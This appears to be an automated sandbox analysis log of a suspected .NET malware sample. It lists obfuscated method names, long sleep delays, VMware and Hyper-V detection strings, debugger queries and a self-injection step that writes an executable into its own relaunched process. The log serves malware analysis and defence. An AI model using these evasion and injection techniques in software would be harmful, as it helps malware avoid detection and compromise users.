                Source: 0.2.file.exe.3cb4880.2.raw.unpack, btw8khDDwIfUUo5yHPb.cs | High entropy of concatenated method names: 'qSoN5joCIo', 'yUhNzdNnYn', 'LyRHEnBvVZ', 'QMkHDWeHc2', 'rNTHXVfuFB', 'EsSHpW9XxO', 'jn5HO2tOXi', 'wjWHh1e4sb', 'NDAHiA5oTR', 'wmiHGsDPoE'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, yytPU1sONoyt1BjlC2.cs | High entropy of concatenated method names: 'bEquiKZfs1', 'mJsumn5sCJ', 'rYiubemykZ', 'T3Ab5tmEYx', 'iM2bzZau7V', 'awLuEjWtgB', 'GsyuDfQOOJ', 'pt4uXZTORb', 'J81updjFoV', 'RcFuOEAfuK'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, Bu0C3TXbaFoYSwWkSy.cs | High entropy of concatenated method names: 'mHWFkgepb', 'Brw82RF5p', 'ITYqmEwcK', 'rkAnBYdF3', 'bDfg2pHnM', 'pFh7ArfRA', 'd6dpvw7RApF8NuAwpZ', 'PxdwBw3hoMF68KiFhn', 'tLyW5yRx7', 'nuEN7xYx7'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, vfb7Ke59TSLxHTW0EU.cs | High entropy of concatenated method names: 'R6kNmcfPph', 'r8KNllVvVk', 'SRxNbVEj0s', 'aTMNuuhdqZ', 'kGjNeTfW5f', 'djHNQdWy4q', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, Qr8SemmafTEU7mZ8y0.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uwKXvyrnkg', 'rXQX5QSESK', 'T1qXza4Bsk', 'YdmpEyeFcx', 'E74pDNLR8A', 'fygpXiQfsL', 'NODppg9wx0', 'YbQLHj4SZN4XahxgmUJ'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, iYx3As6YC78M6Yk1NW.cs | High entropy of concatenated method names: 'tctM4upspg', 'rZqM5fXVfN', 'SH2WEDKcfZ', 'yj0WDWX5ip', 'N7yMjwDkvs', 'xi5M2hJZmD', 'dYfM9f2W6N', 'cDrMZnFH1I', 'ObtM0PD5Un', 'bodMCNrjnX'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, OxjRhtOH873C4t1wPt.cs | High entropy of concatenated method names: 'kWTDunF8bQ', 'AcHDQxQZQT', 'wBjDKhLT3x', 'TslD1GuLx6', 'JYCDRTSJa4', 'zDnDSOExED', 'T4MZLmQy3aCWr54XmB', 'oPk9JoCnByHwyEBIGJ', 'EixDD3ONge', 'n8BDpBPlnU'
                Source: 0.2.file.exe.3cb4880.2.raw.unpack, SaCVJsDO13IhBQaxLAA.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GkKAeYTaNN', 'YhhANZTvoL', 'ubBAH55ptU', 'cRZAA4PbvF', 't3nAT2lvq0', 'F04AY4K3YM', 'rFaAcSjb1k'
                Source: 0.2.file.exe.7550000.5.raw.unpack, HyrVjh9CacVo9sXnV4.cs | High entropy of concatenated method names: 'TqcJU9MtB4', 'RhCJg5yxnH', 'pNPJyqfJr3', 'kBPJtEGKNx', 'LX2JVM1k2x', 'QRvJo8xwQH', 'Xw9JsVEiws', 'Lm5JInXkYD', 'VN8JaIks2b', 'IltJjbvrF6'
                Source: 0.2.file.exe.7550000.5.raw.unpack, ptp44AClmmRtQwH9OI.cs | High entropy of concatenated method names: 'ToString', 'tdRSjAuCL2', 'vlpStaSIXQ', 'TceSPqTDsS', 'Bt9SVYOBST', 'Qs4SoiFpkx', 'iKsSLdxaov', 'vQXSslo1ZX', 'aPLSIAVPNL', 'kVrSdEx01Y'
                Source: 0.2.file.exe.7550000.5.raw.unpack, jLx6J97JddKSKVYCTS.cs | High entropy of concatenated method names: 's93lrr8wfd', 'ykEln3DW2y', 'tUWmPJDbcU', 'oBQmV4XZ5x', 'm5umoQZS7G', 'UxEmLqUfEo', 'WErmslwgX8', 'c3lmIRlArf', 'BZMmdLJcY9', 'iTXmaCgd7P'
                Source: 0.2.file.exe.7550000.5.raw.unpack, na4FDnyOExEDDqNAoT.cs | High entropy of concatenated method names: 'UTfbhaJOGo', 'WF1bGoWCRr', 'nlrblMd6UV', 'weRbuAW658', 'Sr6bQ6XeZJ', 'G7KlBAEQey', 'Se5l6HQA00', 'Yf9lf5UgyY', 'OqQl4NviYc', 'muNlvPoewb'
                Source: 0.2.file.exe.7550000.5.raw.unpack, f3Qs7tzUqjxaSIcVDe.cs | High entropy of concatenated method names: 'I54Nq9X8iG', 'TECNUEvGYG', 'KZrNg0a8fA', 'Iq2NySjNJO', 'BDoNtAD3Bw', 'UDxNVS0jrq', 'n26NooBjZC', 'vKANcpcTbd', 'yFXN3dQRKn', 'D6INxP5FLu'
                Source: 0.2.file.exe.7550000.5.raw.unpack, vnF8bQU8cHxQZQTDPO.cs | High entropy of concatenated method names: 'mNsGZ7INQj', 'xZKG0klSJL', 'SQKGCDPHZo', 'scpGkuyfAc', 'ulOGBbxHVG', 'LgsG6yRm6U', 'D5WGfNXJcm', 'QZJG4rwhQh', 'GAZGvCYEJ3', 'ciLG59xxUY'
                Source: 0.2.file.exe.7550000.5.raw.unpack, MUKi7nQ9sYvdsQsUSw.cs | High entropy of concatenated method names: 'I4XpheYnAV', 'MTbpi5Olg9', 'ytIpGkMV1P', 'gxxpmLSZpp', 'HELpluRH8R', 'DmZpbZNVPp', 'D5bpuJ1SgR', 'zHwpQJrGDr', 'QTYpwCFCPd', 'OgZpKGZEMb'
                Source: 0.2.file.exe.7550000.5.raw.unpack, HSyrTIdPhOoMhSTO09.cs | High entropy of concatenated method names: 'WwBu3XdQUu', 'pVCux9wHir', 'j5MuF9b0fL', 'Lo3u88sKev', 'DYjurUP7Dm', 'hTIuq0j2Tf', 'lI3uniw50x', 'tQDuUvc3fA', 'KsuuggdwO0', 'Q4xu7AUKEF'
                Source: 0.2.file.exe.7550000.5.raw.unpack, faWF1Wf4SQe0KVDGFl.cs | High entropy of concatenated method names: 'oRqeRSv8bF', 'p5aeMM9RCt', 'u4seeJXmdb', 'IcMeH7Fdtn', 'RrAeTMJ6um', 'GWvec0Fo40', 'Dispose', 'BAbWi6mvi4', 'OPIWGFagv1', 'G4JWmeNfNo'
                Source: 0.2.file.exe.7550000.5.raw.unpack, iZcjPAkifOk9vWysUs.cs | High entropy of concatenated method names: 'Y6eMKxIkDK', 'V6JM1FyNVb', 'ToString', 'PjNMiK5ipU', 'Yq7MGZI05r', 'w50Mmj0q3k', 'ymwMlqN2aE', 'sqjMbKhBHg', 'zJsMumawNj', 'hOuMQ38rre'
                Source: 0.2.file.exe.7550000.5.raw.unpack, K234AYgBjhLT3xkslG.cs | High entropy of concatenated method names: 'Y6im8T1CdS', 'ovRmqoDav8', 'GXGmUcLeXb', 'MNpmgN77iC', 'VP5mRTnTMO', 'pQPmSmifIV', 'R72mMaJyst', 'RLcmWGMO7C', 'njemeRuqnQ', 'I08mNPuXnY'
                Source: 0.2.file.exe.7550000.5.raw.unpack, UttuLpGkkmZ8KDhNJ7.cs | High entropy of concatenated method names: 'Dispose', 'ke0DvKVDGF', 'WRIXtyWi6G', 'Pkm0a3a8Th', 'iCRD5BM7Ae', 'gW2DzwRpxh', 'ProcessDialogKey', 'tK0XEdqTBF', 'N6fXDRiC1g', 'YH7XXTfb7K'
                Source: 0.2.file.exe.7550000.5.raw.unpack, RdqTBFva6fRiC1g5H7.cs | High entropy of concatenated method names: 'JVgeyCmOVh', 'lnKet0YKC6', 'Dr0ePwcOAB', 'evceVbuYrd', 'rOQeoS7JRe', 'eOveLFRSxe', 'AMdes6mldK', 'eJ2eIukFtg', 'jUhedqMgsM', 'y4xeapSPHF'
                Source: 0.2.file.exe.7550000.5.raw.unpack, S3CT9ADEFVNxFGFiYcA.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'aaqNjFhnoK', 'yGjN2tNRx0', 'DiRN9cohO7', 'igoNZFkbxK', 'fVZN0YTngn', 'CmONCyQLKo', 'MAfNkaUwTD'
                Source: 0.2.file.exe.7550000.5.raw.unpack, btw8khDDwIfUUo5yHPb.cs | High entropy of concatenated method names: 'qSoN5joCIo', 'yUhNzdNnYn', 'LyRHEnBvVZ', 'QMkHDWeHc2', 'rNTHXVfuFB', 'EsSHpW9XxO', 'jn5HO2tOXi', 'wjWHh1e4sb', 'NDAHiA5oTR', 'wmiHGsDPoE'
                Source: 0.2.file.exe.7550000.5.raw.unpack, yytPU1sONoyt1BjlC2.cs | High entropy of concatenated method names: 'bEquiKZfs1', 'mJsumn5sCJ', 'rYiubemykZ', 'T3Ab5tmEYx', 'iM2bzZau7V', 'awLuEjWtgB', 'GsyuDfQOOJ', 'pt4uXZTORb', 'J81updjFoV', 'RcFuOEAfuK'
                Source: 0.2.file.exe.7550000.5.raw.unpack, Bu0C3TXbaFoYSwWkSy.cs | High entropy of concatenated method names: 'mHWFkgepb', 'Brw82RF5p', 'ITYqmEwcK', 'rkAnBYdF3', 'bDfg2pHnM', 'pFh7ArfRA', 'd6dpvw7RApF8NuAwpZ', 'PxdwBw3hoMF68KiFhn', 'tLyW5yRx7', 'nuEN7xYx7'
                Source: 0.2.file.exe.7550000.5.raw.unpack, vfb7Ke59TSLxHTW0EU.cs | High entropy of concatenated method names: 'R6kNmcfPph', 'r8KNllVvVk', 'SRxNbVEj0s', 'aTMNuuhdqZ', 'kGjNeTfW5f', 'djHNQdWy4q', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.file.exe.7550000.5.raw.unpack, Qr8SemmafTEU7mZ8y0.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uwKXvyrnkg', 'rXQX5QSESK', 'T1qXza4Bsk', 'YdmpEyeFcx', 'E74pDNLR8A', 'fygpXiQfsL', 'NODppg9wx0', 'YbQLHj4SZN4XahxgmUJ'
                Source: 0.2.file.exe.7550000.5.raw.unpack, iYx3As6YC78M6Yk1NW.cs | High entropy of concatenated method names: 'tctM4upspg', 'rZqM5fXVfN', 'SH2WEDKcfZ', 'yj0WDWX5ip', 'N7yMjwDkvs', 'xi5M2hJZmD', 'dYfM9f2W6N', 'cDrMZnFH1I', 'ObtM0PD5Un', 'bodMCNrjnX'
                Source: 0.2.file.exe.7550000.5.raw.unpack, OxjRhtOH873C4t1wPt.cs | High entropy of concatenated method names: 'kWTDunF8bQ', 'AcHDQxQZQT', 'wBjDKhLT3x', 'TslD1GuLx6', 'JYCDRTSJa4', 'zDnDSOExED', 'T4MZLmQy3aCWr54XmB', 'oPk9JoCnByHwyEBIGJ', 'EixDD3ONge', 'n8BDpBPlnU'
                Source: 0.2.file.exe.7550000.5.raw.unpack, SaCVJsDO13IhBQaxLAA.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GkKAeYTaNN', 'YhhANZTvoL', 'ubBAH55ptU', 'cRZAA4PbvF', 't3nAT2lvq0', 'F04AY4K3YM', 'rFaAcSjb1k'
                Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: D80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 29F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: D80000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 7850000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 8850000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 8A00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 9A00000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 1580000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 3090000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Memory allocated: 5090000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599890
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599781
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599671
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599562
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599453
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599343
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599234
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599125
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 599015
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598906
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598797
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598672
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598562
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598453
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598343
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598234
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598125
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 598015
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 597906
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 597797
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 597672
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 597541
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 597437
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 597328
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 597219
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 597109
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 597000
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 596890
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 596781
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 596672
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 596562
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 596453
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 596344
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 596219
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 596109
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 596000
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 595890
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 595781
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 595672
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 595562
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 595453
                Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 595343
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595234Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595125Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 595015Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594906Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594797Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594687Jump to behavior
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 594578Jump to behavior
Source: C:\Users\user\Desktop\file.exe    Window / User API: threadDelayed 9013
Source: C:\Users\user\Desktop\file.exe    Window / User API: threadDelayed 851
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5480    Thread sleep count: 9013 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5480    Thread sleep count: 851 > 30
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -598797s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -598672s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -598562s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -598453s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -598343s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -598125s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -598015s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -597906s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -597797s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -597672s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -597541s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -597328s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -597219s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -597109s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -597000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -596890s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -596781s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -596672s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -596562s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -596453s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -596344s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -596219s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -596109s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -596000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -595890s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -595781s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -595672s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -595562s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -595453s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -595343s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -595234s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -595125s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -595015s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -594906s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -594797s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -594687s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 7364    Thread sleep time: -594578s >= -30000s
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 599890
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 599781
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 599671
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 599562
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 599453
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 599343
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 599234
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 599125
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 599015
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 598906
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 598797
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 598672
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 598562
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 598453
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 598343
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 598234
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 598125
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 598015
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 597906
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 597797
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 597672
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 597541
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 597437
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 597328
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 597219
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 597109
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 597000
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 596890
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 596781
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 596672
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 596562
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 596453
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 596344
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 596219
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 596109
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 596000
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 595890
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 595781
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 595672
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 595562
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 595453
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 595343
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 595234
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 595125
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 595015
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 594906
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 594797
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 594687
Source: C:\Users\user\Desktop\file.exe    Thread delayed: delay time: 594578
Source: Amcache.hve.5.dr    Binary or memory string: VMware
Source: Amcache.hve.5.dr    Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr    Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr    Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr    Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr    Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr    Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr    Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr    Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000002.00000002.4143692345.0000000001456000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllintC
Source: Amcache.hve.5.dr    Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr    Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr    Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe    Binary or memory string: vMCI96
Source: Amcache.hve.5.dr    Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr    Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr    Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr    Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr    Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr    Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr    Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr    Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr    Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr    Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr    Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr    Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr    Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr    Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr    Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr    Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr    Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe    Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe    Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe    Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe    Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe    Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe    Memory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe    Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\file.exe    Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
